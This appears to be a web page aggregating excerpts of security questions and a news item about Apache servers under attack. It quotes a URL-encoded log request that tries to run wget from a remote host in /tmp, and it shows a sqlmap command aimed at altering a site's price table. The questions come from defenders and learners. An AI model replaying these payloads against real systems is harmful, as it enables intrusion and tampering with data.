Collaborate Disseminate
I am using sqlmap to fetch some data from database but unfortunately some data are not accurate. For example, the real data is “APPLE” but sqlmap fetches ‘@PPLE’ or something like this.
In some other cases when I select mult… Continue reading SQLMAP inaccurate data fetch
I was browsing my apache logs, and I found the following request (which resulted in a 404):
106.75.130.216 – – [DD/MMM/YYYY:hh:mm:ss] “GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%36%31%2E%31%36%30… Continue reading How could this attack work?
I was browsing my apache logs, and I found the following request (which resulted in a 404):
106.75.130.216 – – [DD/MMM/YYYY:hh:mm:ss] “GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%36%31%2E%31%36%30… Continue reading How could this attack work?
down vote
favorite
I’m trying to use following code
sqlmap -u “http://exp.com/portal/pd.jsp action=edit&info=products&sub_info=price”
–cookie=”JSESSIONID…..” –dbms Oracle -D PRODUCTS -T PRICE –threads 10
–sql-… Continue reading How to update table with sqlmap and without stacked queries?
as my website is getting hacked constantly I added mod_forensic to analyze the requests and possibly identify the vulernable wordpress part.
However I do not have a timestamp in the log. As this is a very valuable piece of … Continue reading Add time to mod_forensic log [on hold]
I’m doing simulation of a slowloris attack on a Debian server running Apache.
The attacking machines are Debian too.
In order to make sure that the slowloris attack was effective, I would like to access the Apache logs and … Continue reading Detecting slowloris attack by checking Apache log
According to NIST and HIPAA guidance, I miss one cipher on a new web server:
TLS_RSA_WITH_3DES_EDE_CBC_SHA
Despite I read this one is discouraged, I am curious as to how do I add it?
I am on Linux Debian 9 with Apache… Continue reading Apache naming for TLS_RSA_WITH_3DES_EDE_CBC_SHA
I’m running apache2 + mpm_itk so every user is separated from others. In one article it says that:
By default, PHP drops all of its session files and their data into a
single directory, like /tmp. Additionally, again by… Continue reading How can I secure sessions on shared hosting?
A critical vulnerability in Apache Struts 2 is being actively and heavily exploited, even though the patch for it has been released on Monday. System administrators are encouraged to upgrade to version 2.3.32 or 2.5.10.1 as soon as possible to avoid compromise. What is Apache Struts 2, and how is the vulnerability exploited? Apache Struts 2 is an open source web application framework for developing Java EE web applications. The vulnerability (CVE-2017-5638), discovered and reported … More → Continue reading Apache servers under attack through easily exploitable Struts 2 flaw
I have a lot of php files being inserted to my server with spam mail purpose.
When i check the apache access log i notice the following line:
95.213.177.123 – – [07/Mar/2017:12:28:50 -0700] “POST http://check.proxyradar.co… Continue reading Server gets infected with malicious files